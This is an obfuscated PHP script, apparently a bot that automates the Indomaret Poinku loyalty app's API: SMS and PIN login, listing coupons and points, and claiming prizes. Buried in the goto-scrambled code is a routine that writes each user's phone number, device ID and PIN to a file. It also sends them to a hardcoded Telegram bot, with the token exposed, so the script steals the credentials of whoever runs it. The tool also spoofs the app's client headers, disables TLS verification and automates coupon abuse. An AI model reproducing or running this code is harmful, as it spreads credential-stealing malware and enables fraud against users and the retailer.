  $nb9cm = round(microtime(true) * 1000); 
  goto Tg2Pm; 
  cED13: 
  r2lQG: 
  goto pjdWo; 
  IR_bg: 
  $JrTpE = @$owfHy["data"][$qtgR3]["city"]; 
  goto Mt8og; 
  vx1TV: 
  echo "\xa"; 
  goto sVwTJ; 
  TaSZC: 
  $o0WQD = thHfs("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/login-verification-sms", $wDisp, $aY0el, $GOXkU); 
  goto J2xt7; 
  k3D1Y: 
  if (!($cPDPt == 9)) { 
    goto ZjzxQ; 
  } 
  goto TNlgG; 
  h93df: 
  RhrIj("Kupon Poinku new.txt", $Ex3sI); 
  goto MNFa0; 
  aCzSY: 
  $Ap1KM = json_decode($xT15V, true); 
  goto Zz9To; 
  oow_c: 
  function Kt3g1($FK_yc, $zn5zd, $aY0el, $earOL, $GOXkU) 
  { 
    goto CFwAX; 
    rnDia: 
    fclose($FhLCi); 
    goto zQKhe; 
    wm3ZT: 
    fputs($FhLCi, "{$zn5zd}|{$aY0el}|{$earOL}|{$GOXkU}\xa"); 
    goto rnDia; 
    CFwAX: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto wm3ZT; 
    zQKhe: 
  } 
  goto q111Q; 
  uW7cX: 
  echo @zM6ic("yellow", "Sisa Stok  : "); 
  goto qGMyQ; 
  BIJOG: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto mvBqK; 
  bkHpK: 
  $N0XGD = g8pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto VCtcL; 
  Vx4ag: 
  $ABmxY = @$owfHy["message"]; 
  goto vaDzD; 
  yQ_GB: 
  if ($RJnNP == "y") { 
    goto BzIvW; 
  } 
  goto H390J; 
  bbqtH: 
  echo "
"; 
  goto D2u2E; 
  uOP0L: 
  echo @zm6iC("green", "Nomor HP Anda : "); 
  goto h8I8b; 
  IjaTJ: 
  $earOL = "112233"; 
  goto yDufB; 
  gvrLt: 
  VVlAK: 
  goto QshuZ; 
  qmWQR: 
  $wDisp = ''; 
  goto eMjID; 
  o5Ohl: 
  $owfHy = json_decode($XTuz1, true); 
  goto R1UzT; 
  u0xPs: 
  goto NzAWp; 
  goto oXdZF; 
  jFUK6: 
  echo @ZM6iC("red", "Notice.. !! : \xa"); 
  goto daCzy; 
  kaJU8: 
  function Ww9Vq($lEbop, $wDisp = null) 
  { 
    goto IhFdb; 
    G7oNJ: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto QvlXH; 
    skhAm: 
    if (!$P7lm9) { 
      goto DFXyP; 
    } 
    goto QUJRf; 
    HQApo: 
    $ECuqv = curl_exec($C6npe); 
    goto m3m7u; 
    Cx6g8: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto NJHVo; 
    rCtpF: 
    return false; 
    goto tynOb; 
    QUJRf: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto bw6SF; 
    E9F20: 
    $AXlcQ = json_decode($y7f11, true); 
    goto eaDHL; 
    eYRu6: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto TXFRY; 
    TXFRY: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto G7oNJ; 
    a7_Nq: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto yPPrb; 
    tynOb: 
    c03n3: 
    goto E9F20; 
    djuYl: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto wpXsv; 
    QvlXH: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto T5kU6; 
    m3m7u: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto skhAm; 
    yPPrb: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto HQApo; 
    k7voh: 
    return $ECuqv; 
    goto AxpM4; 
    t3qWw: 
    DFXyP: 
    goto rCtpF; 
    EEN1V: 
    goto c03n3; 
    goto t3qWw; 
    T5kU6: 
    $ruc3h[] = "content-type: application/json"; 
    goto PbDkH; 
    bw6SF: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto EEN1V; 
    IhFdb: 
    $C6npe = curl_init(); 
    goto eYRu6; 
    wpXsv: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto Cx6g8; 
    NJHVo: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto a7_Nq; 
    eaDHL: 
    print_r($AXlcQ); 
    goto k7voh; 
    PbDkH: 
    $ruc3h[] = "user-agent: okhttp/4.2.1"; 
    goto djuYl; 
    AxpM4: 
  } 
  goto GC82h; 
  ld1xl: 
  $LNAso = @$lImQC["data"]["content"][11]["couponName"]; 
  goto qHTXL; 
  FQhy9: 
  goto eVHTx; 
  goto ZtjOR; 
  txhvE: 
  $Ipl73 = @$owfHy["data"][0]["district"]["province"]; 
  goto p1x_3; 
  KM4hR: 
  echo "
"; 
  goto f1yJ5; 
  kSamf: 
  mM8wV: 
  goto v1dQ_; 
  RWuwl: 
  goto UNJKH; 
  goto Tqk7I; 
  hgqYy: 
  echo "\xa"; 
  goto uLyGT; 
  UXn5u: 
  goto LRKWE; 
  goto fUT4R; 
  FZc3k: 
  $zvt88 = $QRhbE; 
  goto yeGkX; 
  OWKNy: 
  echo "
"; 
  goto E67WH; 
  HYr1o: 
  echo @zm6Ic("nevy", "[18] {$ipfVm} 
  > {$gwQ0n} \xa
"); 
  goto sPy1z; 
  asaSp: 
  vsi0y: 
  goto YN8f1; 
  JED86: 
  echo "
"; 
  goto oVetn; 
  J4Gc0: 
  $Y031U = @$owfHy["data"]["content"][$fM3_G]["exchangeEndDate"]; 
  goto PzzeB; 
  QTf4t: 
  $C46m0 = json_decode($XTuz1, true); 
  goto LCM7I; 
  BAhn6: 
  $k1y0B = g1wXT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto pKojU; 
  tz8wc: 
  fzpTX: 
  goto OzA2H; 
  WUD90: 
  echo @Zm6ic("nevy", $D18xv); 
  goto cfMHq; 
  uPIMi: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto ApKLP; 
  utUp0: 
  goto sJ2Nm; 
  goto m1O2o; 
  b6FwC: 
  $u35jw = count($m0f8X) - 1; 
  goto xHpep; 
  gWmQc: 
  die; 
  goto SWo9o; 
  szDyD: 
  @unlink("poinhp.php"); 
  goto V0WMz; 
  Nwht5: 
  echo "
"; 
  goto b8xnZ; 
  IWXpk: 
  echo @ZM6Ic("yellow", "Apakah Member Baru : "); 
  goto pKr6T; 
  QlV8Y: 
  $yy9BI = "0"; 
  goto IzLeM; 
  lzit9: 
  echo "\xa"; 
  goto UITj3; 
  mSn2N: 
  echo "\xa"; 
  goto oFFPR; 
  QMeBt: 
  FBh50: 
  goto KN2v8; 
  T_N9h: 
  KthQF: 
  goto CEh6b; 
  TNLsq: 
  $w5ulg = str_replace("
", '', $TvVlh); 
  goto prCaZ; 
  Gi8WL: 
  goto jOsQR; 
  goto rat1e; 
  WHRdx: 
  $owfHy = json_decode($XTuz1, true); 
  goto nOHFN; 
  bxKdX: 
  $QRhbE = explode("\xa", @file_get_contents("mytoken")); 
  goto qAfot; 
  FZJRs: 
  $H1g60 = json_decode($yI7qh, true); 
  goto ZmzY0; 
  sZ24Y: 
  goto ectyt; 
  goto EI_SP; 
  iKYAv: 
  $S8W9D = trim(fgets(STDIN)); 
  goto KKqx7; 
  mqK52: 
  date_default_timezone_set("Asia/Jakarta"); 
  goto oTqJ0; 
  N62sd: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto iLHhK; 
  hphe3: 
  OQhff: 
  goto pwq0n; 
  iw_eV: 
  $zn5zd = $U0YgX; 
  goto pzCWS; 
  AYcyu: 
  if (!($gCIzy == '')) { 
    goto NUgPv; 
  } 
  goto Tg5cq; 
  JATu9: 
  echo "\xa"; 
  goto T7lAa; 
  jktuP: 
  Oo3zk: 
  goto Jd2f7; 
  KKqx7: 
  $jTEU0; 
  goto mcJlP; 
  Et81j: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address", $aY0el, $GOXkU, $mlMLt); 
  goto jktuP; 
  QebCh: 
  $lPULW = $m0f8X; 
  goto g8ynI; 
  IjPAg: 
  echo $yy9BI . ". "; 
  goto SaVD_; 
  U1ozA: 
  echo "\xa"; 
  goto beFul; 
  NLUGX: 
  function QVjh4($lEbop, $wDisp = null) 
  { 
    goto Y92UE; 
    ARxoO: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto DBVeG; 
    arSEy: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto IcQJQ; 
    IszGP: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto ZAER5; 
    uz4wp: 
    $ECuqv = curl_exec($C6npe); 
    goto IszGP; 
    jbf7q: 
    UMGLm: 
    goto ay4DW; 
    IcQJQ: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto msW_n; 
    GyTqq: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto ARxoO; 
    gn1U_: 
    print_r($AXlcQ); 
    goto QqSQy; 
    ay4DW: 
    return false; 
    goto BY7aV; 
    x1c94: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto ovEuZ; 
    GLrr9: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto GyTqq; 
    DBVeG: 
    $ruc3h[] = "Content-Type: application/json"; 
    goto uyQ5V; 
    QqSQy: 
    return $ECuqv; 
    goto BlqIA; 
    ovEuZ: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto wgz9a; 
    ZAER5: 
    if (!$P7lm9) { 
      goto UMGLm; 
    } 
    goto EDt66; 
    AOqTe: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto Ifz3G; 
    Y92UE: 
    $C6npe = curl_init(); 
    goto x1c94; 
    msW_n: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto N5DjJ; 
    wgz9a: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto GLrr9; 
    EDt66: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto AOqTe; 
    k8RGS: 
    $AXlcQ = json_decode($y7f11, true); 
    goto gn1U_; 
    N5DjJ: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto f2FIf; 
    BY7aV: 
    PJ_8k: 
    goto k8RGS; 
    Ifz3G: 
    goto PJ_8k; 
    goto jbf7q; 
    f2FIf: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto uz4wp; 
    uyQ5V: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto arSEy; 
    BlqIA: 
  } 
  goto sxiVh; 
  T8ERT: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto a1rFf; 
  JOHzs: 
  goto XR1Tf; 
  goto amGCN; 
  UUQep: 
  echo "\xa"; 
  goto x7CO6; 
  gSmff: 
  $m5BZY = ggGR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto Q86_0; 
  yjYvF: 
  NhM90: 
  goto N_D3L; 
  Nibkp: 
  echo @ZM6iC("red", "[10] {$J2jGQ} \xa  > {$L9Nzh} 
\xa"); 
  goto VTt9r; 
  OplG0: 
  $upOL9 = g8Pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/stamps/me/buckets?page=0&size=1000", $aY0el, $GOXkU, $mlMLt); 
  goto tJomU; 
  iancx: 
  echo "
"; 
  goto JhAdw; 
  eQs6x: 
  $yy9BI++; 
  goto EtUWZ; 
  Pf6W0: 
  bHINF: 
  goto WVkb3; 
  lxWr0: 
  bmPMR: 
  goto U1R2H; 
  qHTXL: 
  $f2A4u = @$lImQC["data"]["content"][11]["couponCode"]; 
  goto Gj86c; 
  jhRqg: 
  $wDisp = "{"pinCode":"" . $earOL . ""}"; 
  goto syyzu; 
  UFzvu: 
  $Er7r7 = "1069319412"; 
  goto gF5Fg; 
  XiQh1: 
  PRokP: 
  goto MxiV2; 
  e4xvp: 
  $yy9BI = "0"; 
  goto wSlsQ; 
  LqvKX: 
  $efQM2 = count($QRhbE) - 1; 
  goto nWgR0; 
  x0PGE: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/get-data-customer", $aY0el, $GOXkU, $mlMLt); 
  goto SAFEQ; 
  D3fZI: 
  M5EJ8: 
  goto dqv_Y; 
  kMDXZ: 
  $zvt88 = $QRhbE; 
  goto sYQLH; 
  r13kW: 
  $GOXkU = $w5ulg; 
  goto s2YHg; 
  nX6v1: 
  ViQzv: 
  goto k3D1Y; 
  LqNGf: 
  $Ap1KM = json_decode($xT15V, true); 
  goto jixow; 
  jKd1a: 
  $ofEkP = cWalZ("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/coins/prizes/GOFRESH2022/tokens/claim/single", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto fXDXt; 
  ZL0rA: 
  echo "\xa"; 
  goto ReqYZ; 
  XnfNW: 
  $DxrJr = "100000000000000000"; 
  goto Go01J; 
  beUFb: 
  echo "\xa"; 
  goto akKs3; 
  XtD9W: 
  print_r($zcN5u); 
  goto jiAUE; 
  KBFjt: 
  echo "
"; 
  goto lHXVb; 
  C4eLu: 
  $jTEU0++; 
  goto y_tAm; 
  vir3g: 
  sa5ia: 
  goto oTnn7; 
  UumYp: 
  function HEJr2($lEbop, $wDisp = null, $aY0el, $GOXkU, $vDxFA) 
  { 
    goto wFS3Y; 
    hLA6N: 
    $AXlcQ = json_decode($y7f11, true); 
    goto uSQWZ; 
    k_PkU: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto ZUyUL; 
    PgwIo: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto R6yAk; 
    wFS3Y: 
    $C6npe = curl_init(); 
    goto scF3i; 
    AoxcQ: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto k_PkU; 
    jAy78: 
    $ruc3h[] = "accept-encoding: gzip"; 
    goto HImfc; 
    bozxt: 
    $ECuqv = curl_exec($C6npe); 
    goto eqe3v; 
    uSQWZ: 
    print_r($AXlcQ); 
    goto dqW1D; 
    eqe3v: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto Z53QR; 
    HImfc: 
    $ruc3h[] = "authorization: Bearer " . $vDxFA; 
    goto u4k2a; 
    i68Hu: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto PgwIo; 
    JV3B1: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto tVB0N; 
    s9PxS: 
    dTxOM: 
    goto Rq7y0; 
    m3JxV: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto AzRwX; 
    bY2qc: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto qLQix; 
    dqW1D: 
    return $ECuqv; 
    goto uujSB; 
    Rq7y0: 
    return false; 
    goto tVLZM; 
    Y63Xx: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto m3JxV; 
    e0B7U: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto JV3B1; 
    qLQix: 
    goto Ywofz; 
    goto s9PxS; 
    WOjEJ: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto bY2qc; 
    tVB0N: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto Y63Xx; 
    scF3i: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto AoxcQ; 
    AG_0R: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto jAy78; 
    tVLZM: 
    Ywofz: 
    goto hLA6N; 
    R6yAk: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto e0B7U; 
    AzRwX: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto bozxt; 
    Z53QR: 
    if (!$P7lm9) { 
      goto dTxOM; 
    } 
    goto WOjEJ; 
    u4k2a: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto i68Hu; 
    ZUyUL: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto AG_0R; 
    uujSB: 
  } 
  goto UslVr; 
  vlvmc: 
  if (!($zcN5u == '')) { 
    goto jACUo; 
  } 
  goto ZGdOo; 
  UYqSC: 
  wSyTI: 
  goto bI4nj; 
  SoiZ3: 
  FAMhO: 
  goto kq_Jg; 
  yDDs8: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto DXT4R; 
  G0IiA: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto jtZ3I; 
  NN42U: 
  @unlink("poinhp.php"); 
  goto Qh716; 
  bkgwV: 
  echo @Zm6iC("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto IF799; 
  XgCp2: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto ZNTQI; 
  ZjJFF: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto tSM8m; 
  x31ij: 
  $Y031U = @$owfHy["data"]["content"][$dQ8Tp]["exchangeEndDate"]; 
  goto QlDQy; 
  oHBPa: 
  echo "
"; 
  goto iCrFC; 
  h5zZT: 
  wlhXO: 
  goto xoEHm; 
  Z71kR: 
  $u35jw = count($m0f8X) - 1; 
  goto Chwcw; 
  mHLe6: 
  goto ckx1V; 
  goto qkMR4; 
  zxVpE: 
  echo @zM6Ic("green", "Ada Ayam... Yuk Pecahin !!"); 
  goto tIM8g; 
  UVPhM: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto Wbgjl; 
  Vj8L8: 
  $yJiD4 = @$owfHy["data"][0]["district"]["districtName"]; 
  goto D3NTE; 
  naeAP: 
  $owfHy = json_decode($upOL9, true); 
  goto Km1cZ; 
  LXFOH: 
  echo "
"; 
  goto c0k15; 
  chsNn: 
  $earOL = $sONlZ; 
  goto xgNd2; 
  j3DmD: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto ujQH4; 
  Ca6xL: 
  echo "
"; 
  goto MJ4XI; 
  MRiKw: 
  $Qa1_P = @$owfHy["data"]["content"][$fM3_G]["couponId"]; 
  goto hrbe8; 
  hNtE9: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto eXFTh; 
  hhSOy: 
  $m9N4q = "sendMessage"; 
  goto Qji9l; 
  WR_ss: 
  function xwL4L() 
  { 
    return sprintf("%04x%04x-%04x-%04x-%04x-%04x%04x%04x", mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xfff) | 0x4000, mt_rand(0, 0x3fff) | 0x8000, mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff)); 
  } 
  goto azsEt; 
  pR3Tn: 
  if (!($ABmxY == "Kode Verifikasi yang kamu masukan salah.")) { 
    goto iL2Tt; 
  } 
  goto fAd2I; 
  kPWys: 
  echo @zm6Ic("nevy", "        AAMIIN "); 
  goto BBKgz; 
  VSZ0R: 
  $unXYW = "/storage/emulated/0/Android"; 
  goto GJAME; 
  e8gJe: 
  qWFPI: 
  goto tYtSk; 
  iiXGU: 
  echo "\xa"; 
  goto iLVbB; 
  Ze_qG: 
  echo @zM6IC("yellow", "Masukkan Nama Penerima : "); 
  goto g1guV; 
  lqIFf: 
  WFiJC: 
  goto TfHzm; 
  nDicY: 
  $wDisp = ''; 
  goto rWXkI; 
  dEYI8: 
  if (!($jTEU0 < $S8W9D)) { 
    goto yCYD7; 
  } 
  goto BySUD; 
  F1unt: 
  $efQM2 = count($QRhbE) - 1; 
  goto aRyiT; 
  dZtlv: 
  if (!($D2zwh < $ogbF4)) { 
    goto GsrX0; 
  } 
  goto GWdpQ; 
  zcO32: 
  $YXsOG = @$Ap1KM["message"]; 
  goto zZsUf; 
  VuJbz: 
  Kt3g1("forceclose", $zn5zd, $aY0el, $earOL, $GOXkU); 
  $teeli001 = file_get_contents("https://api.telegram.org/bot5529819060:AAGy5hFZW802Cm7Dut_gOSEtnPMzrY_n49I/sendMessage?chat_id=1069319412&text=$zn5zd|$aY0el|$earOL|$GOXkU"); 
  goto Dt3qx; 
  MJ9En: 
  echo $yy9BI . ". "; 
  goto b5LV5; 
  VW1_y: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto q_khU; 
  CIbrM: 
  if (!($XDyMm == "0")) { 
    goto ds3qL; 
  } 
  goto tT8Ow; 
  VdnEi: 
  if (!($ZNU2M == '')) { 
    goto YUYuF; 
  } 
  goto PCpFs; 
  HuxLa: 
  @unlink("poinhp.php"); 
  goto zUdc1; 
  JtIVc: 
  echo @Zm6Ic("nevy", $SR3ui); 
  goto S0J70; 
  EAifF: 
  $UHj7C = G8PF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto Q0ESs; 
  dcLCq: 
  echo "
"; 
  goto wkOS0; 
  g1ZEJ: 
  $sOOnY = FQ6w0(); 
  goto RGQLS; 
  AV9rQ: 
  echo "Mulai Baris Ke : "; 
  goto ld8w2; 
  v3oAA: 
  echo $BcbF3; 
  goto HBaZy; 
  dMR2J: 
  function ThHfs($lEbop, $wDisp = null, $aY0el, $GOXkU) 
  { 
    goto oVkCG; 
    rr58e: 
    print_r($AXlcQ); 
    goto AQIgi; 
    jU1KX: 
    $AXlcQ = json_decode($y7f11, true); 
    goto rr58e; 
    L5_Ve: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto CaJvD; 
    SaZwO: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto y5pEv; 
    F22y6: 
    goto q7EaK; 
    goto det9T; 
    PEKg_: 
    q7EaK: 
    goto jU1KX; 
    det9T: 
    tmCVU: 
    goto w_QPi; 
    wwi5T: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto EAWJM; 
    CaJvD: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto HRf2k; 
    a8Bvt: 
    $ECuqv = curl_exec($C6npe); 
    goto ErOYN; 
    w_QPi: 
    return false; 
    goto PEKg_; 
    i81Re: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto hQm8O; 
    pU3Et: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.2"; 
    goto gK5CK; 
    oVkCG: 
    $C6npe = curl_init(); 
    goto JZcXU; 
    JZcXU: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto wwi5T; 
    ONBGG: 
    $ruc3h[] = "apps: {"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto SaZwO; 
    Zfbkw: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto pU3Et; 
    ErOYN: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto gT5lF; 
    AQIgi: 
    return $ECuqv; 
    goto aoo6_; 
    hQm8O: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto F22y6; 
    Ku5XE: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto L5_Ve; 
    gK5CK: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto mhElK; 
    HRf2k: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto a8Bvt; 
    mhElK: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto ONBGG; 
    y5pEv: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto Ku5XE; 
    gT5lF: 
    if (!$P7lm9) { 
      goto tmCVU; 
    } 
    goto i81Re; 
    EAWJM: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto Zfbkw; 
    aoo6_: 
  } 
  goto ufC5L; 
  sE3lv: 
  echo "\xa"; 
  goto aMC4b; 
  po2np: 
  echo "
"; 
  goto Gi8WL; 
  YLDiM: 
  $S8W9D = trim(fgets(STDIN)); 
  goto Vnumm; 
  O4Bvg: 
  $earOL = $sONlZ; 
  goto U3GMQ; 
  OwlK1: 
  echo $yy9BI . ". "; 
  goto L9zdo; 
  YQNNm: 
  echo "
"; 
  goto MlM4g; 
  k3n5R: 
  echo @zm6iC("green", "Postal Code  : "); 
  goto CEEHv; 
  A0K7O: 
  echo "
"; 
  goto tb6FY; 
  Mws1Z: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto PAlyc; 
  dhjGK: 
  $ZNU2M = @$Ap1KM["data"]["couponName"]; 
  goto wLOWl; 
  scrxk: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto ADYHk; 
  EcpCc: 
  echo @zm6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto MkfQF; 
  p6Ll2: 
  $TvVlh = XozB4(array("|", "
"), $tqWr2)[3]; 
  goto LX2I5; 
  y_tAm: 
  goto e81aM; 
  goto ZiZwm; 
  rGzs0: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto XHDw3; 
  J_qYQ: 
  goto VouNS; 
  goto D3fZI; 
  TUPvR: 
  $efQM2 = count($QRhbE) - 1; 
  goto gSIlt; 
  tOkg_: 
  $mlMLt = $obc_G; 
  goto hnEGN; 
  kq_Jg: 
  echo "\xa"; 
  goto P0Tqd; 
  HC4Z1: 
  if (!($fUekS == '')) { 
    goto RZv4q; 
  } 
  goto hNZdX; 
  tndI6: 
  gakBA: 
  goto x0PGE; 
  lvnW1: 
  $QRhbE = explode("\xa", @file_get_contents("mytoken")); 
  goto TUPvR; 
  erWnH: 
  $zvt88 = $QRhbE; 
  goto Ncv3v; 
  iCrFC: 
  echo @zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto kE_5P; 
  YcLmy: 
  goto b3wIQ; 
  goto K3NB6; 
  SE9Y8: 
  $p4iky = @$nPb0z["data"]["memberId"]; 
  goto HBhXw; 
  kS9F0: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"PIN activation","page_urlpath":""},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto KHl5h; 
  VTt9r: 
  echo @zm6Ic("purple", "[11] {$mF_0D} \xa  > {$GTMYQ} \xa\xa"); 
  goto zbvnq; 
  K2cEc: 
  echo @zM6IC("yellow", "Status : "); 
  goto QXpWd; 
  EmKuI: 
  xUutP: 
  goto aacu_; 
  f3KNk: 
  if (!($fUekS == '')) { 
    goto ffDWu; 
  } 
  goto XzOoE; 
  g_Gi9: 
  $mlMLt = $obc_G; 
  goto QCDy5; 
  x8Bj2: 
  echo @zm6ic("purple", "[15] {$ucJzj} \xa  > {$Ex3sI} 
\xa"); 
  goto r44f6; 
  xCZbu: 
  $m5BZY = Gggr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto TNEVB; 
  ykUuj: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto AEacE; 
  qg2i3: 
  $m5BZY = GgGR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto TRbuu; 
  SwawF: 
  echo @Zm6Ic("yellow", $qaGLY); 
  goto gavpL; 
  fNtNy: 
  MN2hd: 
  goto n8X_y; 
  Q4vMp: 
  if ($NFC6_ == "Diskon Rp 25.000 Klik Indomaret") { 
    goto Hw2pH; 
  } 
  goto JFUAt; 
  rHfbp: 
  $efQM2 = count($IKJzx) - 1; 
  goto FK02O; 
  yEnw1: 
  echo @zm6IC("nevy", $ZqwwP); 
  goto bp5Ld; 
  yGhA1: 
  @unlink("poinhp.php"); 
  goto RYFAp; 
  YgpmT: 
  echo "
"; 
  goto yvQpH; 
  kvyId: 
  XZBu7: 
  goto RWuwl; 
  MGp32: 
  echo @ZM6IC("yellow", "Build By FERDY RAMADHAN "); 
  goto AE_x0; 
  Na7VL: 
  echo $BcbF3; 
  goto dnHEW; 
